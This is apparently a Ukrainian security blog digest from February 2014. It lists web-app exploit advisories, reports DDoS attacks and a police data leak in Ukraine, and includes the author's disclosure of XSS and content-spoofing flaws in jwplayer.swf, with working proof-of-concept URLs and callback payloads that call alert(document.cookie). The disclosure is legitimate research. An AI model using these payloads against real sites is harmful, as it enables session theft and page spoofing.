Websecurity - Веб безпека

В даній добірці уразливості в веб додатках:

• Multiple vulnerabilities in McAfee ePO 4.6.6 (деталі)
• Local File Include in Nagios Looking Glass (деталі)
• vBulletin remote admin injection exploit (деталі)
• Multiple CSRF Horde Groupware Web mail Edition 5.1.2 (деталі)
• Re: Multiple vulnerabilities in McAfee ePO 4.6.6 (деталі)

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах WordPress Themes, Amplus та Pretty Photo. Для котрих з’явилися експлоіти. WordPress Themes - це теми движка (Bordeaux, Bulteno, Oxygen, Radial, Rayoflight, Reganto і Rockstar), Amplus - це тема движка, Pretty Photo - це плагін для створення фото галереї.

• WordPress Themes Remote File Upload (деталі)
• WordPress Amplus Cross Site Request Forgery (деталі)
• WordPress Pretty Photo Cross Site Scripting (деталі)

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.

Раніше я писав про січневі DDoS атаки в Україні, а зараз розповім про ситуацію в лютому.

Враховуючи протистояння яке з вівторка триває в Україні, відбулися наступні DDoS атаки та взломи в Уанеті.

Хакери Anonymus в якості акції протесту провели DDoS атаки на наступні державні сайти в Уанеті:

DDoS на www.president.gov.ua - 18.02.2014
DDoS на nmckherson.gov.ua - 19.02.2014

Невідомими хакерами (явно провладними) були атаковані наступні сайти:

DDoS на hromadske.tv - 18.02.2014
DDoS на 5.ua - 18.02.2014
DDoS на censor.net.ua - 20.02.2014
DDoS на maidanhelp.com.ua - 28.02.2014
DDoS на helpmaidan.org.ua - 28.02.2014
DDoS на banderivets.org.ua - 28.02.2014
DDoS на qha.com.ua - 28.02.2014

А також Анонімуси взломали базу даних МВС і виклали список працівників Беркуту в своєму акаунті в соціальні мережі.

В списку вказані ПІБ, Дата народження (цифри і зірочки), Домашня адреса (лише зірочки), Підрозділ. Вони заявляють, що це фрагмент БД для демонстрації.

Виявлена можливість виконання коду через шаблони в Perl.

Уразливі версії: Perl 5.17.

Можна викликати зовнішні функції при компіляції шаблонів.

• Perl vulnerability (деталі)

В даній добірці експлоіти в веб додатках:

• Seagate BlackArmor NAS sg2000-2000.1331 - Cross Site Request Forgery (деталі)
• Conceptronic Wireless Pan & Tilt Network Camera - CSRF Vulnerability (деталі)
• Feixun Wireless Router FWR-604H - Remote Code Execution Exploit (деталі)
• Red Hat CloudForms Management Engine 5.1 agent/linuxpkgs Path Traversal (деталі)
• Synology DiskStation Manager SLICEUPLOAD Remote Command Execution (деталі)

13.11.2013

У жовтні, 27.10.2013, я знайшов Cross-Site Scripting та Content Spoofing уразливості в DSMS. Які я виявив на dsmsu.gov.ua. Про що найближчим часом повідомлю розробникам системи.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам.

15.02.2014

XSS (WASC-08):

http://site/templates/default/js/jwplayer/player.swf?playerready=alert(document.cookie)
http://site/templates/default/js/jwplayer/player.swf?displayclick=link&link=data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ%2B&file=1.jpg

XSS (WASC-08):

Якщо на сайті на сторінці з jwplayer.swf (player.swf) є можливість включити (через HTML Injection) JS код з калбек функцією, а таких функцій всього 19, то можна провести XSS атаку. Тобто JS-калбеки можна використати для XSS атаки.

<script type="text/javascript" src="jwplayer.js"></script>
<div id="container">...</div>
<script type="text/javascript">
jwplayer("container").setup({
flashplayer: "jwplayer.swf",
file: "1.flv",
autostart: true,
height: 300,
width: 480,
events: {
onReady: function() { alert(document.cookie); },
onComplete: function() { alert(document.cookie); },
onBufferChange: function() { alert(document.cookie); },
onBufferFull: function() { alert(document.cookie); },
onError: function() { alert(document.cookie); },
onFullscreen: function() { alert(document.cookie); },
onMeta: function() { alert(document.cookie); },
onMute: function() { alert(document.cookie); },
onPlaylist: function() { alert(document.cookie); },
onPlaylistItem: function() { alert(document.cookie); },
onResize: function() { alert(document.cookie); },
onBeforePlay: function() { alert(document.cookie); },
onPlay: function() { alert(document.cookie); },
onPause: function() { alert(document.cookie); },
onBuffer: function() { alert(document.cookie); },
onSeek: function() { alert(document.cookie); },
onIdle: function() { alert(document.cookie); },
onTime: function() { alert(document.cookie); },
onVolume: function() { alert(document.cookie); }
}
});
</script>

Content Spoofing (WASC-12):

http://site/templates/default/js/jwplayer/player.swf?file=1.flv&backcolor=0xFFFFFF&screencolor=0xFFFFFF
http://site/templates/default/js/jwplayer/player.swf?file=1.flv&image=1.jpg
http://site/templates/default/js/jwplayer/player.swf?config=1.xml
http://site/templates/default/js/jwplayer/player.swf?playlistfile=1.rss
http://site/templates/default/js/jwplayer/player.swf?playlistfile=1.rss&playlist.position=right&playlist.size=200

В системі є й інші дірки, про які я повідомив розробникам. Дані уразливості досі не виправлені.

За повідомленням www.xakep.ru, технічні деталі DDoS-атаки з NTP-посиленням.

Компанія Cloudflare розголосила технічні деталі найбільшої DDoS-атаки з NTP-посиленням, про яку повідомлялося 10 лютого.

Фахівці говорять, що вони і раніш бачили DDoS-атаки на 400 Гбит/с, але вперше така атака використовує метод посилення UDP-трафіка саме через сервери мережевого часу NTP. Це нова загроза для мережі, вважає Cloudflare.

За повідомленням www.opennet.ru, ініціатива по організації незалежного аудита Firefox.

Бренден Айк, творець мови JavaScript, що займає посаду технічного директора Mozilla Corporation, запропонував організувати процес незалежної безупинної верифікації кодової бази Firefox. Для того, щоб гарантувати неможливість впровадження в продукт коду для здійснення стеження й інших прихованих дій.

Сліпої довіри виробнику і його заслуженій репутації недостатньо, тому що діючі в США законодавчі акти дозволяють примусити виробника до здійснення дій, що йдуть врозріз з тими принципами, яких вони дотримують в області безпеки і приватності.

За повідомленням www.ruskur.ru, хакери взломали поштовий сервіс Yahoo.

Американська інтернет-корпорація Yahoo повідомила своїм передплатникам про те, що її поштовий сервіс піддався атаці хакерів - у їх розпорядженні виявилися паролі від користувацьких акаунтів. Про це повідомляється в прес-релізі компанії.

У Yahoo також упевнені, що логіни і паролі від користувацьких скриньок були викрадені не зі сховища компанії, а від третьої сторони.

Виявлений витік інформації в cURL.

Уразливі продукти: cURL 7.34, libcurl 7.34.

При використанні NTLM-аутентифікації запит може бути відправлений через невірне з’єднання.

• curl security update (деталі)

В даній добірці уразливості в веб додатках:

• Command Injection via CSRF on DD-WRT v24-sp2 (деталі)
• Blind SQL Injection in Ops View (деталі)
• Multilple Cross Site Scripting (XSS) Attacks in Ops View (деталі)
• ILIAS eLearning 4.3.4 & 4.4 CMS - Persistent Notes Web Vulnerability (деталі)
• Exploit Tool Targets Vulnerabilities in McAfee ePolicy Orchestrator (ePO) (деталі)

У лютому, 04.02.2013, вийшов Mozilla Firefox 27. Нова версія браузера вийшла через два місяці після виходу Firefox 26.

Mozilla офіційно випустила реліз веб-браузера Firefox 27, а також мобільну версію Firefox 27 для платформи Android. Відповідно до шеститижневого циклу розробки, реліз Firefox 28 намічений на 18 березня, а Firefox 29 на 29 квітня.

Також був випущений Seamonkey 2.24 та оновлені гілки із тривалим терміном підтримки Firefox 24.3.0 і Thunderbird 24.3.0.

Окремо варто відзначити, що крім нововведень і виправлення помилок у Firefox 27.0 усунуто 13 уразливостей, серед яких 4 позначені як критичні, що можуть привести до виконання коду зловмисника при відкритті спеціально оформлених сторінок. Причому ця кількість - це саме патчі (Mozilla типово виправляє по декілька дір за один патч).

• Увидел свет Firefox 27 (деталі)